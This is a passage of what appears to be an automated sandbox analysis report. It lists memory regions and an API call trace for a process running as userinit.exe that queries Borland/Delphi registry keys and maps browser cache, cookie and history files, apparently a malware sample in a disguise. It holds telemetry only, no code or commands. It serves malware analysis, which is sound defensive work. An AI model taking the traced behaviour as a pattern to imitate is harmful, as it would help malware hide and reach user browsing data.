id = 4027
start_va = 0x2680000
end_va = 0x2706fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4028
start_va = 0x13c0000
end_va = 0x1448fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 4031
start_va = 0x2680000
end_va = 0x270afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4032
start_va = 0x13c0000
end_va = 0x144cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 4033
start_va = 0x2680000
end_va = 0x270efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4037
start_va = 0x13c0000
end_va = 0x1450fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 4038
start_va = 0x2680000
end_va = 0x2712fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4039
start_va = 0x13c0000
end_va = 0x1454fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 4040
start_va = 0x2680000
end_va = 0x2716fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4044
start_va = 0x13c0000
end_va = 0x1458fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 4045
start_va = 0x2680000
end_va = 0x271afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4046
start_va = 0x13c0000
end_va = 0x145cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 4049
start_va = 0x2680000
end_va = 0x271efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4050
start_va = 0x13c0000
end_va = 0x1460fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 4051
start_va = 0x2680000
end_va = 0x2722fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4055
start_va = 0x13c0000
end_va = 0x1464fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 4056
start_va = 0x2680000
end_va = 0x2726fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4057
start_va = 0x13c0000
end_va = 0x1468fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 4061
start_va = 0x2680000
end_va = 0x272afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4062
start_va = 0x13c0000
end_va = 0x146cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 4063
start_va = 0x2680000
end_va = 0x272efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4066
start_va = 0x2730000
end_va = 0x27e0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4067
start_va = 0x27f0000
end_va = 0x28a2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 4068
start_va = 0x2680000
end_va = 0x2734fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4071
start_va = 0x2740000
end_va = 0x27f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
id = 4072
start_va = 0x2680000
end_va = 0x2738fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4073
start_va = 0x2740000
end_va = 0x27fafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
id = 4076
start_va = 0x2680000
end_va = 0x273cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4077
start_va = 0x2740000
end_va = 0x27fefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
id = 4078
start_va = 0x2800000
end_va = 0x28c0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 4081
start_va = 0x2680000
end_va = 0x2742fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4082
start_va = 0x2750000
end_va = 0x2814fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002750000"
filename = ""
Region:
id = 4083
start_va = 0x2680000
end_va = 0x2746fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4086
start_va = 0x2750000
end_va = 0x2818fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002750000"
filename = ""
Region:
id = 4087
start_va = 0x2680000
end_va = 0x274afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4090
start_va = 0x2750000
end_va = 0x281cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002750000"
filename = ""
Region:
id = 4091
start_va = 0x2680000
end_va = 0x274efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4092
start_va = 0x2750000
end_va = 0x2820fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002750000"
filename = ""
Region:
id = 4095
start_va = 0x2830000
end_va = 0x2902fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 4096
start_va = 0x2680000
end_va = 0x2754fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4099
start_va = 0x2760000
end_va = 0x2836fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002760000"
filename = ""
Region:
id = 4100
start_va = 0x2680000
end_va = 0x2758fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4104
start_va = 0x2760000
end_va = 0x283afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002760000"
filename = ""
Region:
id = 4105
start_va = 0x2680000
end_va = 0x275cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4106
start_va = 0x2760000
end_va = 0x283efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002760000"
filename = ""
Region:
id = 4108
start_va = 0x2840000
end_va = 0x2920fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 4109
start_va = 0x2680000
end_va = 0x2762fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4112
start_va = 0x2770000
end_va = 0x2854fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 4113
start_va = 0x2680000
end_va = 0x2766fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4116
start_va = 0x2770000
end_va = 0x2858fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 4117
start_va = 0x2680000
end_va = 0x276afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4118
start_va = 0x2770000
end_va = 0x285cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 4121
start_va = 0x2680000
end_va = 0x276efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4134
start_va = 0x2770000
end_va = 0x2860fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 4135
start_va = 0x2870000
end_va = 0x2962fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002870000"
filename = ""
Region:
id = 4136
start_va = 0x2680000
end_va = 0x2774fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4141
start_va = 0x2780000
end_va = 0x2876fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4147
start_va = 0x2680000
end_va = 0x2778fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4148
start_va = 0x2780000
end_va = 0x287afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4171
start_va = 0x2680000
end_va = 0x277cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4172
start_va = 0x2780000
end_va = 0x287efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4173
start_va = 0x2880000
end_va = 0x2980fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 4174
start_va = 0x2680000
end_va = 0x2782fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4175
start_va = 0x2790000
end_va = 0x2894fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4176
start_va = 0x2680000
end_va = 0x2786fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4177
start_va = 0x2790000
end_va = 0x2898fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4178
start_va = 0x2680000
end_va = 0x278afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4179
start_va = 0x2790000
end_va = 0x289cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4180
start_va = 0x2680000
end_va = 0x278ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4181
start_va = 0x28a0000
end_va = 0x29b2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028a0000"
filename = ""
Region:
id = 4182
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4183
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4184
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 4185
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 4186
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 4187
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 4188
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 4189
start_va = 0x310000
end_va = 0x310fff
entry_point = 0x310000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 4190
start_va = 0x29c0000
end_va = 0x2abffff
entry_point = 0x0
region_type = private
name = "private_0x00000000029c0000"
filename = ""
Region:
id = 4191
start_va = 0x360000
end_va = 0x360fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000360000"
filename = ""
Region:
id = 4192
start_va = 0x6ce80000
end_va = 0x6ce98fff
entry_point = 0x6ce80000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 4193
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 4194
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 4195
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 4196
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 4197
start_va = 0x1480000
end_va = 0x14bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 4198
start_va = 0x1500000
end_va = 0x153ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 4199
start_va = 0x2bc0000
end_va = 0x2cbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002bc0000"
filename = ""
Region:
id = 4200
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 4201
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 4202
start_va = 0x2cc0000
end_va = 0x2f8efff
entry_point = 0x2cc0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4203
start_va = 0x680000
end_va = 0x681fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000680000"
filename = ""
Region:
id = 4204
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 4205
start_va = 0x690000
end_va = 0x690fff
entry_point = 0x690000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 4206
start_va = 0x6a0000
end_va = 0x6a1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006a0000"
filename = ""
Region:
id = 4207
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4208
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 4209
start_va = 0x690000
end_va = 0x690fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000690000"
filename = ""
Region:
id = 4210
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4211
start_va = 0x13c0000
end_va = 0x13ebfff
entry_point = 0x13c0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 4212
start_va = 0x6b0000
end_va = 0x6b7fff
entry_point = 0x6b0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 4213
start_va = 0x6c0000
end_va = 0x6cffff
entry_point = 0x6c0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 4214
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4215
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4216
start_va = 0x2f90000
end_va = 0x30dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f90000"
filename = ""
Region:
id = 4217
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 4218
start_va = 0x13f0000
end_va = 0x146ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000013f0000"
filename = ""
Region:
id = 4219
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 4220
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 4221
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4222
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4223
start_va = 0x2ac0000
end_va = 0x2b7ffff
entry_point = 0x2ac0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 258
os_tid = 0x764
[0127.733] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0127.733] GetKeyboardType (nTypeFlag=0) returned 4
[0127.733] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0127.734] GetStartupInfoA (in: lpStartupInfo=0x8fdf4 | out: lpStartupInfo=0x8fdf4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0127.734] GetVersion () returned 0x1db10106
[0127.734] GetVersion () returned 0x1db10106
[0127.734] GetCurrentThreadId () returned 0x764
[0127.734] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x8f8f0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0127.734] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8f7cb, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0127.734] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x8f8e0 | out: phkResult=0x8f8e0*=0x0) returned 0x2
[0127.734] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x8f8e0 | out: phkResult=0x8f8e0*=0x0) returned 0x2
[0127.734] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x8f8e0 | out: phkResult=0x8f8e0*=0x0) returned 0x2
[0127.734] lstrcpynA (in: lpString1=0x8f7cb, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0127.734] GetThreadLocale () returned 0x409
[0127.734] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x8f8db, cchData=5 | out: lpLCData="ENU") returned 4
[0127.735] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0127.735] lstrcpynA (in: lpString1=0x8f7e8, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0127.735] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0127.735] lstrcpynA (in: lpString1=0x8f7e8, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0127.735] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0127.736] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0127.736] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0xc3640
[0127.736] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x580000
[0127.736] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0xc4640
[0127.736] VirtualAlloc (lpAddress=0x580000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x580000
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x8fa14, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x8fa00, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0127.737] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x8fa00, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0127.737] GetVersionExA (in: lpVersionInformation=0x8fd98*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x8fd98*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0127.738] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0127.738] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0127.738] GetThreadLocale () returned 0x409
[0127.738] GetThreadLocale () returned 0x409
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Jan") returned 4
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x8fc70, cchData=256 | out: lpLCData="January") returned 8
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Feb") returned 4
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x8fc70, cchData=256 | out: lpLCData="February") returned 9
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Mar") returned 4
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x8fc70, cchData=256 | out: lpLCData="March") returned 6
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Apr") returned 4
